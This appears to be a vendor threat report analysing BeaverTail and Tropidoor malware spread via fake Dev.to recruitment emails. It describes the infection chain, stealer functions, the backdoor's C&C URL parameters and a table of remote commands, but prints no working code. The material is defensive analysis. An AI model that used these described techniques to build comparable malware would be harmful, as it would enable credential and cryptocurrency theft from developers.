BeaverTail and Tropidoor Malware Distributed via Recruitment Emails
On November 29, 2024, a case was disclosed in which threat actors impersonated a recruitment email from a developer community called Dev.to to distribute malware. [1] In this case, the attacker provided a BitBucket link containing a project, and the victim discovered malicious code within the project and disclosed it to the community. The project contained BeaverTail, a malware disguised as “tailwind.config.js,” and a downloader malware called “car.dll”.
Figure 1. Attack disclosed in the developer community
Although the link is currently unavailable for download, VirusTotal contains compressed files including the “car.dll” downloader and BeaverTail. Analysis based on these files confirmed the execution logs of “car.dll” and the presence of BeaverTail in South Korea. BeaverTail is known to be used by North Korean attackers for information theft and downloading additional payloads.
The “car.dll” downloader is characterized by implementing Windows commands internally, similar to the LightlessCan malware of the Lazarus group disclosed in a past ESET report.
1. Attack Details
The project file obtained from VirusTotal contain the downloader malware “car.dll” and BeaverTail malware “tailwind.config.js” responsible for executing the downloader. Another compressed file also contained similar BeaverTail and the same downloader, distributed under the name “img_layer_generate.dll”.
Figure 2. Inside the project file
BeaverTail is known to be distributed primarily in phishing attacks disguised as job offers, such as the ones targeting LinkedIn users. While most of the known cases involve attacks from overseas, there have been related cases in Korea as well. The case above is also a foreign case, but it is characterized by the fact that related logs have been found in Korea. The installation path, too, is similar to the one mentioned in the above post, with the presence of the “autopart” keyword in “%SystemDrive%\0_***workfile\_work\autosquare\autopart\car.dll”.
Figure 3. Downloader execution logs
Additionally, logs suspected to be from BeaverTail were confirmed a few minutes after the downloader was installed on the system. The use of Curl for downloading and the names of the downloaded files, “p.zi” and “p2.zip”, are known behaviors of BeaverTail. [2] The download address also matches the address mentioned in the BeaverTail report published by Zscaler in November 2024.
2. BeaverTail
The JavaScript malware named “tailwind.config.js” includes obfuscated routine and a routine to execute “car.dll” located in the same path.
Figure 4. Obfuscation routine and car.dll execution routine
The obfuscated routine is BeaverTail malware, which performs Infostealer and downloader functions, targeting web browsers to steal credential information and cryptocurrency wallet data, and downloading additional malware like InvisibleFerret.
Figure 5. Uploading exfiltrated information and downloading additional payload
3. Tropidoor
The malware operating in memory through the downloader is a backdoor. Upon execution, it decrypts and attempts to connect to 4 C&C server addresses. After successful connection, it collects basic system information and generates a random 0x20 byte key, which is encrypted with an RSA public key and transmitted. The RSA public key is encrypted with Base64, and the randomly generated 0x20 byte key is used for packet encryption during C&C communication.
Figure 6. Decrypted RSA public key and encryption routine
In the first communication with the C&C server, the system information obtained above and a random key encrypted with the RSA public key are encoded in Base64 and transmitted through the “tropi2p” and “gumi” parameters, respectively. A random 5-byte string is then generated, which is likely used as a Session ID because it is used with the “s_width” parameter in other communication processes.
| URL Format | Description |
|---|---|
| tropi2p=[Info]&gumi=[Key]&s_width=[SessionID] | Transfer information |
| letter=400BadRequest&s_width=[SessionID] | Receive commands |
| letter=[Result]&s_width=[SessionID] | Send command execution results |
Table 1. URL format for C&C communication
Afterward, “400BadRequest” is inserted in the “letter” parameter and sent to the C&C server, which allows the threat actor to receive commands from the C&C server. After executing the received commands, the results are encoded in the same way and sent through the “letter” parameter.
The following commands can be received from the C&C server. Most of them are similar to commands found in other backdoors, but command #34 is unique.
| Command No. | Description |
|---|---|
| 3 | “nestat -ano” command |
| 4 | “ipconfig /all” command |
| 5 | “systeminfo” command |
| 6 | “dir” command |
| 7 | File deletion (overwrite with NULL data) |
| 8 | File time modification |
| 9 | Screenshot capture |
| 10 | File scan |
| 12 | Process execution |
| 13 | Process execution (user token) |
| 14 | Process termination |
| 15 | Specific address scan |
| 16 | Inject downloaded payload into another process or load in memory |
| 17 | File deletion (overwrite with random values) |
| 19 | Compress and send files as zip |
| 23 | Collect drive information |
| 24 | Collect file information |
| 25 | Set wait time |
| 26 | Save as configuration file (“C:\ProgramData\Microsoft\DeviceSync\WinRT_DeviceSync.etl”) |
| 28 | Send configuration data |
| 29 | Modify configuration data |
| 30 | Send string “tZeqxYw” |
| 32 | Send data read via pipe communication |
| 34 | Execute Windows commands |
Table 2. C&C command no.
Command 34 involves directly implementing basic Windows commands such as “schtasks”, “ping”, and “reg”. This method is similar to the LightlessCan malware reported by ESET in the past. [3]
Figure 7. Windows commands implemented in the code
4. Conclusion
Recently, attacks suspected to be carried out by North Korean attackers have been continuously confirmed. The case revealed this time confirmed the attack details of BeaverTail malware, which is known to be used in attacks targeting overseas. Additionally, the malware used in this case also showed connections to previous attack cases.
Users should be cautious not only with email attachments but also with executable files from unknown sources. Updating V3 to the latest version can help prevent malware infection in advance.
Gain access to related IOCs and detailed analysis by subscribing to AhnLab TIP. For subscription details, click the banner below.
